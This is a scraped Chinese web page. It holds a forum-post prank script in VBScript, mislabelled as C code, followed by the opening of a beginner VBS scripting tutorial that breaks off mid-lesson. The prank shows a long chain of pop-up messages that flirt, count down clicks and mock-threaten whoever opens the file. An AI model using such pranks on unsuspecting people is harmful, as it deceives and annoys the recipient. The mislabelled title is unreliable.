C 语言整人代码大全WScript.Echo("嘿,谢谢你打开我哦,我等你很久 拉!"&TSName) WScript.Echo("你是可爱的小朋吗?") WScript.Echo("哈,我想你拉,这你都不知道吗?") 顶 举报| 2011-06-01 20:46回复 菊花爆开 电白自学 2楼 WScript.Echo("怎么才来,说~是不是不关心我") WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。") WScript.Echo("小强很生气,后果很严重哦。") WScript.Echo("嘿嘿!你也会很惨滴哦") WScript.Echo("是不是想清除我?") WScript.Echo("那你要点上50下哦,不过会给你惊喜滴") WScript.Echo("还剩49下,快点点哦") WScript.Echo("还剩48下,快点,小笨蛋!") WScript.Echo("还剩47下对,就这样快点点!") WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰 你工作。") WScript.Echo("还剩45下,记得要快哦!") WScript.Echo("还剩43下") WScript.Echo("还剩42下") WScript.Echo("还剩41下") WScript.Echo("还剩40下") WScript.Echo("还剩39下") WScript.Echo("还剩38下") WScript.Echo("还剩37下") WScript.Echo("还剩36下") WScript.Echo("还剩35下")
WScript.Echo("还剩34下") WScript.Echo("还剩33下") WScript.Echo("还剩32下") WScript.Echo("还剩30下") WScript.Echo("还剩29下") WScript.Echo("还剩28下") WScript.Echo("还剩27下") WScript.Echo("还剩26下") WScript.Echo("还剩25下") WScript.Echo("还剩24下") WScript.Echo("还剩23下") WScript.Echo("还剩22下") WScript.Echo("还剩21下") WScript.Echo("还剩20下") WScript.Echo("还剩19下") WScript.Echo("还剩18下") WScript.Echo("还剩17下") WScript.Echo("还剩16下") WScript.Echo("还剩15下") WScript.Echo("还剩14下") WScript.Echo("还剩13下停停!!!慢点,我有话要说") WScript.Echo("还剩12下,你继续点我就会消失滴") WScript.Echo("还剩11下,以后就看不到我拉。555555") WScript.Echo("还剩10下,你现在可以选择停止!") WScript.Echo("还剩9下。你还点啊,不要我拉?") WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家") WScript.Echo("还剩7下。疯了,你有点负意!") WScript.Echo("还剩6下。对。你就点吧,我恨你!") WScript.Echo("还剩5下,不明白,删除我你就好吗?") WScript.Echo("还剩4下!真要删除我?") WScript.Echo("还剩3下。可是我真的很眷恋你。。。") WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你 的!") WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无 义!!!") WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝 又给了一次机会。") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次")
VBS脚本编程简明教程
第一章VBS脚本编程简明教程 第一节◎Vbs脚本编程简明教程之一—为什么要使用Vbs? 在Windows中,学习计算机操作也许很简单,但是很多计算机工作是重复性劳动,例如你每周也许需要对一些计算机文件进行复制、粘贴、改名、删除,也许你每天启动计算机第一件事情就是打开WORD,切换到你喜爱的输入法进行文本编辑,同时还要播放优美的音乐给工作创造一个舒心的环境,当然也有可能你经常需要对文本中的某些数据进行整理,把各式各样的数据按照某种规则排列起来……。这些事情重复、琐碎,使人容易疲劳。 第三方软件也许可以强化计算机的某些功能,但是解决这些重复劳动往往事倍功半,我也尝试过使用计算机语言编写程序来解决这些问题,但是随之而来的命令、语法、算法、系统框架和类库常常让我觉得这样是否有必要,难道就是因为猪毛比较难拔,所以我就要去学习机械,为自己设计一个拔猪毛机(?)吗? Vbs是一种Windows脚本,它的全称是:Microsoft Visual Basic Script Editon.(微软公司可视化BASIC脚本版),VBS是Visual Basic的的一个抽象子集,是系统内置的,用它编写的脚本代码不能编译成二进制文件,直接由Windows系统执行(实际是一个叫做宿主host的解释源代码并执行),高效、易学,但是大部分高级语言能干的事情,它基本上都具备,它可以使各种各样的任务自动化,可以使你从重复琐碎的工作中解脱出来,极大的提高工作效率。 我个人认为Vbs脚本其实就是一种计算机编程语言,但是由于缺少计算机程序设计语言中的部分要素,对于事件的描述能力较弱,所以称为脚本,它最方便的地方就是提供了对COM对象的简便支持。那么什么是COM对象呢? 我这样理解,COM对象就是一些具有特定函数功能项程序模块,他们一般以ocx或者dll作为扩展名,你只要找到包含有你需要的功能的模块文件,并在脚本中规范的引用,就可以实现特定的功能,也就是说Vbs脚本就是调用现成的“控件”作为对象,用对象的属性和方法实现目的,完全免去了编写代码、设计算法等等麻烦。说白了,我不是觉得拔猪毛麻烦么?我发觉xx机(比如真空离心器)有一个功能可以实现脱毛,ok,我把它拿来给猪脱毛。什么?大材小用?太浪费资源了?天哪,那是计算机芯片的事情,死道友不死贫道,反正我的事情是方便快速的解决了,这就行了。 最方便的是它甚至不需要专门的开发环境,在你的计算机中,只要有notepad,就可以编写Vbs脚本了,并且可以直接执行。 第二节◎Vbs脚本编程简明教程之二—如何开始第一个Vbs脚本? 就像多数计算机教程一样,我们从“Hello World!”程序开始我们的练习。什么?不知道是什么意思?就是说大部分的计算机程序设计教程开篇入门都是编写一个小程序,执行这个程序的结果就是在计算机的屏幕上或者dos窗口中显示一行文字:Hello World!好了,我们开始吧。 打开你的“记事本”程序,在编辑窗口填写: